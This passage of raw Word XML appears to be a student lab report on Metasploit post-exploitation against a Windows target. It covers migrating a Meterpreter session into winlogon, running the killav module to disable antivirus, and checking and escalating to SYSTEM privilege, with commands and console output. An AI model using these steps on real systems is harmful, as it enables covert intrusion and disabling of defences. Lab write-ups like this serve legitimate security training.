          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834D24">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC9B31" w14:textId="682C31C0" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc21101959"/>
      <w:r w:rsidRPr="00A511F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Part 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Process Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="027D82FF" w14:textId="241727DC" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E2157"/>
    <w:p w14:paraId="2760F7BF" w14:textId="27636DB9" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc21101960"/>
      <w:r w:rsidRPr="008E2157">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>k 1:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2C750D67" w14:textId="60DD7A8E" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E21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Using Meterpreter’s command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24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> find a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>suitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> process to migrate to. What process did you choose and why? What is the ID of this this process?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB392D2" w14:textId="23145816" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0494CB70" w14:textId="5D82A25C" w:rsidR="00FA5CCD" w:rsidRDefault="007E3DFF" w:rsidP="007E3DFF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ab/>
        <w:t xml:space="preserve">The process chosen to migrate the Meterpreter session was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. This process is more reliable for maintaining the Meterpreter session. For example, migrating to the internet explorer process may cause the application to lag or not work properly. As a result the user could restart the process and jeopardize the Meterpreter session.</w:t>
      </w:r>
      <w:r w:rsidR="008E2157">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3C7930B7" w14:textId="77777777" w:rsidR="00FA5CCD" w:rsidRDefault="00FA5CCD" w:rsidP="008E2157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E83F6A4" w14:textId="5B4D3864" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="00FA5CCD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs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 xml:space="preserve">The ID of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>winlogon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process is the following: </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2157">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>532</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C75ACED" w14:textId="0977D1FF" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BFEB91" w14:textId="458B2344" w:rsidR="008E2157" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc21101961"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 2:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="27533017" w14:textId="16BCC09C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  <w:r w:rsidRPr="005A41B9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Force to background the current Meterpreter sessions and find the </w:t>
      </w:r>
      <w:r w:rsidRPr="005A41B9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>proper</w:t>
      </w:r>
      <w:r w:rsidRPr="005A41B9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> post exploit to use for process migration. What exploit did you select?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6235EB4D" w14:textId="4990D684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</w:p>
    <w:p w14:paraId="4AD9B9FA" w14:textId="414229A2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ab/>
        <w:t xml:space="preserve">After doing some research in Metasploit, the </w:t>
      </w:r>
      <w:r w:rsidR="00FA5CCD">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit that I selected to migrate our </w:t>
      </w:r>
      <w:r w:rsidR="00946D81">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">eterpreter session was the </w:t>
      </w:r>
      <w:r w:rsidRPr="005A41B9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>post/windows/manage/migrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B2E90" w14:textId="77777777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</w:p>
    <w:p w14:paraId="28F10BBD" w14:textId="0FDBEF95" w:rsidR="005A41B9" w:rsidRPr="005A41B9" w:rsidRDefault="005A41B9" w:rsidP="005A41B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc21101962"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 3:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="620F60ED" w14:textId="7B903C21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Perform the exploit and report the commands/options you used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCA7C9" w14:textId="77777777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</w:p>
    <w:p w14:paraId="54827539" w14:textId="76A1462B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 xml:space="preserve">Here are the commands used to migrate our </w:t>
      </w:r>
      <w:r w:rsidR="00946D81">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eterpreter session to the desired process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E8D5A" w14:textId="40A17B4E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</w:p>
    <w:p w14:paraId="141698D5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meterpreter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background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1DF06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Backgrounding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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7705B322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exploit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smb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ms08_067_netapi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migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B603E8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migrate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51C0AC21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67984773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migrate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PID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>532</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FA0255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PID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532</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3864E0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migrate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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782B1BA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BE909EF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against ADMIN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2BDBD2BA8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562ED5BD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 process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svchost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exe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984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DCA8B2D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Spawning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notepad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 process to migrate to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A1D2E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Migrating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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E53C4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Successfully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migrated to process </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F048D1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execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EFCAB" w14:textId="70F40DDB" w:rsidR="005A41B9" w:rsidRPr="005A41B9" w:rsidRDefault="00946D81" w:rsidP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migrate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6699CB3B" w14:textId="6A1B9175" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc21101963"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 2 Killing the Antivirus:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3EA81424" w14:textId="51196C5D" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81"/>
    <w:p w14:paraId="575F09F8" w14:textId="17960CEB" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc21101964"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 4:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="727A5BE6" w14:textId="16EC0E5E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Select the proper exploit to kill the antivirus system of the target machine (if any). What exploit did you use?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFE3AB" w14:textId="25FE07D1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</w:p>
    <w:p w14:paraId="1D7E9799" w14:textId="0C83DDAF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ab/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00FA5CCD">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit that I will use to kill the antivirus system on the target machine will be the </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D81">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>post/windows/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00946D81">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>killav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exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F60ED" w14:textId="6946711C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</w:p>
    <w:p w14:paraId="4E6E39AE" w14:textId="408C83F5" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc21101965"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 5:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="69AF28F7" w14:textId="0CA0FF98" w:rsidR="00946D81" w:rsidRPr="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Report the commands/options you used in order to kill the antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA53272" w14:textId="77777777" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED63A27" w14:textId="1777498F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migrate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killav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B819EFF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killav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56BD5249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380A9675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killav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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093ADB7A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2028A0C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target processes were found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</w:p>
    <w:p w14:paraId="2676C714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execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C00024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killav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23BE40C3" w14:textId="21D22F8F" w:rsidR="00946D81" w:rsidRPr="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D8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2B952F7" w14:textId="39DC4D5A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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The target system does not have an antivirus system running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56447BC5" w14:textId="7A860D71" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc21101966"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 3: Obtaining System Privilege</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="03BE8EEE" w14:textId="407E0313" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81"/>
    <w:p w14:paraId="3D48B5BC" w14:textId="31EA18A0" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc21101967"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 6:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7CBF927B" w14:textId="199764CE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What is the Meterpreter command to check the privilege level of the current Meterpreter session?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6002ECAE" w14:textId="6B3EB1BD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</w:p>
    <w:p w14:paraId="5F359A64" w14:textId="2B6A5B8C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ab/>
        <w:t xml:space="preserve">The Meterpreter command to check the privilege level of the current Meterpreter session is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A46DE61" w14:textId="7BCE04E1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</w:p>
    <w:p w14:paraId="07AE427A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29572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meterpreter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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4339096D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2957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username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NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE0017" w14:textId="7E2B82E5" w:rsidR="00946D81" w:rsidRPr="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D8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99E1D2E" w14:textId="290F6E53" w:rsidR="00946D81" w:rsidRDefault="00946D81" w:rsidP="00946D81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21101968"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 7:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="09E80486" w14:textId="35E3AC53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What is the proper exploit to escalate the privilege to system level? Please note that this exploit does not always work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56B19C" w14:textId="6AE8961F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</w:p>
    <w:p w14:paraId="4E22D795" w14:textId="5939B28E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ab/>
        <w:t>The proper</w:t>
      </w:r>
      <w:r w:rsidR="00FA5CCD">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit to escalate the privilege to system level is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00946D81">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>post/windows/escalate/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00946D81">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF535A" w14:textId="1ABD6BA1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</w:p>
    <w:p w14:paraId="6FD6C159" w14:textId="5FC5FDB5" w:rsidR="00946D81" w:rsidRDefault="00B93457" w:rsidP="00B93457">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc21101969"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Georgia"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Task 8:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="49A2F8FF" w14:textId="196EFE24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Perform the exploit and report the commands/options you used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521876E8" w14:textId="0F96753B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</w:p>
    <w:p w14:paraId="3A1116C1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escalate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escalate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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CA2CCF2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escalate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4C9D29CB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44592E55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escalate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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5347B3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1F2692F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 already has SYSTEM privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9EAAC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execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C7D9C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escalate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17B03EEC" w14:textId="4B1B9B32" w:rsidR="00B93457" w:rsidRPr="00B93457" w:rsidRDefault="00B93457" w:rsidP="00B9345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8604EFD" w14:textId="1583E5BA" w:rsidR="00B93457" w:rsidRDefault="00B93457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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Meterpreter session that we acquired from the original exploit had system privileges already.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EFB0BF" w14:textId="4FF43D66" w:rsidR="00B93457" w:rsidRDefault="00B93457" w:rsidP="00B93457">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc21101970"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 4: Persistence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="67E4552F" w14:textId="3DA4D1D4" w:rsidR="00B93457" w:rsidRDefault="00B93457" w:rsidP="00B93457"/>
    <w:p w14:paraId="77127F1D" w14:textId="114E3C67" w:rsidR="00B93457" w:rsidRDefault="00B93457" w:rsidP="00B93457">
